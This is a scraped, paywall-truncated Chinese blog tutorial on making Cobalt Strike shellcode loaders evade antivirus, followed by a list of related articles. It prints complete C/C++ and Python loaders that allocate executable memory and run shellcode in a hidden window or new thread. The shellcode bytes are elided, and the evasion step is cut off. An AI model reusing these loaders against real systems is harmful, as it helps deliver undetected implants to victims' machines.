python 生成payload_利用python免杀cs shellcode

最新推荐文章于 2024-06-05 15:16:35 发布
最新推荐文章于 2024-06-05 15:16:35 发布
阅读量781 收藏 2
点赞数 1
文章标签: python 生成payload
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39834488/article/details/111637280
版权

原创AgeloVito合天智汇

0x01 前言

​ 2019年,告别了coder的世界,告别了从前的生活。我决定暂时抛开金钱至上的价值体系,以一个Fucking loser的身份去寻找人生中的三大哲学问题,我是谁,我在哪儿,我在做什么。褪去了互联网行业的尔虞我诈,轻浮缥缈。在这个铺天盖地的泛娱乐时代,我决定去看看大海,去感受下海水的味道,没错,它确实是咸的。当沙滩上的沙子铺满全身的那一刻,我,拥有了几分钟童年。在途中,偶遇了黄河,没错,它确实很黄,并且波涛汹涌。也在这途中,缘分使我进入了曾经告别的安全行业。

0x02 概述

1、什么是shellcode

​ 在维基百科中这样解释道:在黑客攻击中,shellcode是一小段代码,用于利用软件漏洞作为有效载荷。它之所以被称为“shellcode”,是因为它通常启动一个命令shell,攻击者可以从这个命令shell控制受损的计算机,但是执行类似任务的任何代码都可以被称为shellcode。因为有效载荷(payload)的功能不仅限于生成shell,所以有些人认为shellcode的名称是不够严谨的。然而,试图取代这一术语的努力并没有得到广泛的接受。shellcode通常是用机器码编写的。

​ 翻译成人话就是:shellcode是一段机器码,用于执行某些动作。

2、什么是机器码

​ 在百度百科中这样解释道:计算机直接使用的程序语言,其语句就是机器指令码,机器指令码是用于指挥计算机应做的操作和操作数地址的一组二进制数。

​ 翻译成人话就是:直接指挥计算机的机器指令码。

​ 人们用助记符号代替机器指令码从而形成了汇编语言,后来为了使计算机用户编程序更容易,发展出了各种高级计算机语言。但是,无论是汇编语言还是其他各种面向过程异或面向对象的高级语言所写的代码最终都要被相关的翻译编译环境转换成相应的机器指令码,计算机才能运行该段代码,因为计算机只认识机器指令码。

3、什么是shellcode loader

​ 人话:shellcode loader 是用于加载和运行shellcode的代码。

C/C++ 加载方式

#include "pch.h"
#include <windows.h>
#include <stdio.h>
#pragma comment(linker,"/subsystem:"windows" /entry:"mainCRTStartup"")//不显示窗口

unsigned char shellcode[] = "xfcxe8x89x00x00x00x60x89xe5......";

void main()
{
    
    LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode),MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (Memory == NULL) {
     return; }
    memcpy(Memory, shellcode, sizeof(shellcode));
    ((void(*)())Memory)();
}

Python 加载方式

#!/usr/bin/python
import ctypes

shellcode = bytearray("xfcxe8x89x00x00x00x60x89......")

ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                          ctypes.c_int(len(shellcode)),
                                          ctypes.c_int(0x3000),
                                          ctypes.c_int(0x40))

buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
                                     buf,
                                     ctypes.c_int(len(shellcode)))

ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.c_int(ptr),
                                         ctypes.c_int(0),
                                         ctypes.c_int(0),
                                         ctypes.pointer(ctypes.c_int(0)))

ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

​ 当然,shellcode loader的编写方式很多,汇编,go,csharp以及其他很多语言,这里不在一一举例,接下来我们进入利用python语言编写 shellcode loader 以达到静态动态都绕过杀软的目的。

0x03 为什么使用python

​ python语言入门门槛低,上手快,且两三年前就出现了这种免杀方式,但是很多人说网上公开的代码已经不免杀了。事实真的如此吗?你有没有静下心来code过,是否去了解过相关的原理,是否通过学习到的原理去

最低0.47元/天 解锁文章
weixin_39834488
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python中Request Payload参数使用(持续更新)
北慕的博客
10-27 7665
在post请求中的参数中,Request Payload会经常碰到,但很多同学可能并未真正如何去使用,碰到复杂点的Request Payload往往一头雾水,下面就我日常所遇到的一些案例做个简单的说明,希望对大家有帮助。
利用pythoncs shellcode
蚁景网安学院
02-13 2143
0x01 前言2019年,告别了coder的世界,告别了从前的生活。我决定暂时抛开金钱至上的价值体系,以一个Fucking loser的身份去寻找人生中的三大哲学问题,我是谁,我在哪儿,...
实战shell&C2远控&工具魔改(日记 - 上篇)
最新发布
guanjian_ci的博客
06-05 1351
1、上面实验内容并不多,但是工具的使用、环境的安装、代码的排错够新手玩上几天了。2、绕过毒软件的本质就是防止被毒库匹配,代码、工具指纹等等!3、一个好的,一定具备了多方面的性能:防软、绕过流量平台、防沙箱、防逆向调试后依然能够正常运行上线!4、此文章分上 、 中 、下,未完待续... ...
python => 处理字符串,制作payload
嗯哼~~~
09-08 165
遇到过这样的情形,测试认证漏洞的时候,需要特别制作payload,仅是试验用的数据就有100个,如果要制作一个payload集每个密码之间都间隔一个正确密码,就得粘贴100次。这还是最简单的payload。如果需要的payload是json格式呢?有个现成的payload密码集100个,现在需要在每个密码前插入一个已知账号的正确密码,最后也是200行。例如,用户名payload为,一个已知账号 + 一个待测试账号,重复100遍,一共200行。如果要求payload是这样的。只能写个脚本了,如下是例子。
python 生成payload_Payload生成脚本(命令执行,XSS,奇葩等价变形等)
weixin_33301547的博客
02-09 523
import sysfrom getopt import getoptdef notx(payload):a=''retval=""for x in payload:a=''for bi in '0'*(8-len(format(ord(x),'b')))+format(ord(x),'b'):k='1' if bi=='0' else '0'a=a+kretval=retval+'%'+form...
通过Python实现Payload分离过程详解
09-16
主要介绍了通过Python实现Payload分离过程详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
使用Python进行防病毒解析
12-23
本文主要探讨了如何利用Python来创建payload,避被防病毒软件检测到,从而提高渗透测试工具的隐蔽性。 首先,环境准备是关键。为了构建Python payload,我们需要安装Python 2.7.16 x86版本,因为一些...
Payload_Dumber_x64.zip
07-04
Payload_Dumber_x64.zip是一个针对一加手机的刷机包工具,主要包含了解包工具payload_dumper.exe,以及相关的输入输出文件payload_input和payload_output,还有Readme.txt说明文件。这个工具主要用于处理一加手机的...
Payload_Dumber_x64.7z
10-14
Payload_Dumber_x64.7z】是一个针对一加手机刷机过程中的关键文件`payload.bin`的解包工具。在深入探讨之前,我们首先理解一下`payload.bin`的含义。`payload.bin`是一加手机系统更新过程中的重要组成部分,它包含...
python 生成payload_Python payload
weixin_35076634的博客
02-09 1798
最新项目用于Web应用程序的JSON WebTokens实用程序。可以生成和验证签名和加密的令牌,有无储存或自嘲。先决条件为了使用加密功能,我们创建了一个加密密钥。需要存储此密钥才能在应用程序中重 ...2021-02-09已阅读: n次简单重量一个非常简单的jwt库。支持的算法HS256HS384HS512用法编码返回新令牌。from simplejwt import encodetoken =...
python爬虫实现POST request payload形式的请求
12-20
1. 背景 最近在爬取某个站点时,发现在POST数据时,使用的数据格式是request payload,有别于之前常见的 POST数据格式(Form data)。而使用Form data数据的提交方式时,无法提交成功。 1.1. Http请求中Form Data 和 Request Payload的区别 AJAX Post请求中常用的两种传参数的形式:form data 和 request payload 1.1.1. Form data get请求的时候,我们的参数直接反映在url里面,形式为key1=value1&key2=value2形式,比如: http://news.baidu.
python 生成payload_如何使用Python进行Payload
weixin_36243867的博客
01-14 846
很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被掉?打造的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。0x01 环境准备1、软件安装Python 2.7.16 x86:http...
Python PyYAML反序列化漏洞实验和Payload构造
3569
04-24 3420
0x01 概述什么程序存在漏洞:使用了PyYAML这个库并且使用了yaml.load而不是yaml.safe_load函数来解析yaml文件的程序代码审计关键词:import yamlyaml.load(已知相关漏洞:Remote Code Execution Vulnerability in Ansible-Vault Library. (CVE-2017-2809)https://pypi.p...
Python 为url每个参数赋值Payload(为域名每个参数赋值Payload)
墨痕诉清风的博客
01-19 192
1. 入参url也许是没有参数的请求,也许是多个参数的请求。2. 遍历每个参数为每个参数赋值Payload做请求尝试。3. 过滤白名单、黑名单。
python写简单的脚本-你用 Python 写过哪些牛逼的程序/脚本?
weixin_37988176的博客
10-30 618
原标题:你用 Python 写过哪些牛逼的程序/脚本?【导读】:有网友在 Quora 上提问,「你用 Python 写过最牛逼的程序/脚本是什么?」。本文摘编了 3 个国外程序员的多个小项目,含代码。Manoj Memana Jayakumar, 3000+ 顶更新:凭借这些脚本,我找到了工作!可看我在这个帖子中的回复,《Has anyone got a job through Quora? Or...
Python爬虫系列之payload加密算法
Packager
09-14 1716
省省回头车数据采集,算法加解密!
Python爬虫实战(十三)Post请求中Payload处理分析—以某素材分享网为例
shine4869的博客
10-03 6082
目录一、二、实战演练三、全部代码参考文章 一、 二、实战演练 三、全部代码 参考文章
Python反序列化上线CS:两次编码绕过
Miracle_ze的博客
08-21 2021
如果在测试中出现crypto问题,是因为在使用python是经常会用到import一个第三方库,但是有时候会提示某个模块不存在,如Crypto其实是因为Python3里面这个模块的名字变了。这里的编码是我们上传了服务器已经编码过一次的内容进行了的反序列化,对反序列化后的内再次base64编码。编码base64编码 =》aes 加密 =》base64编码 加密1次 解密1次。此时加密后输入的加密格式是base64格式,为此要解密前需要先base64解密再进行AES解密。在文件内容加入反序列化结果。
CS结合python3混淆shellcode制作脚本
m0_48108919的博客
03-19 7386
文章参考自:Cobalt Strike操作 - 技术文章 - 90Sec 0x00基础知识 Cobalt Strike简介 Cobalt Strike是一款功能强大的渗透工具,集成了端口转发、提权、凭据导出、服务扫描、文件捆绑、木马生成,钓鱼等多种功能。Cobalt Strike作为一款协同工具,主要用于团队作战,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和sessions。 Shellcode介绍 简单翻译 ' shell代码 ',是Payload的一种,由于其建立正向/反
RTP_PAYLOAD_TYPE_H264和RTP_PAYLOAD_TYPE_H265
07-12
`RTP_PAYLOAD_TYPE_H264` 和 `RTP_PAYLOAD_TYPE_H265` 是常量或宏定义,用于表示 RTP(Real-time Transport Protocol,实时传输协议)中 H.264 和 H.265(也称为HEVC)视频的负载类型。 RTP 是一种用于实时传输音...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值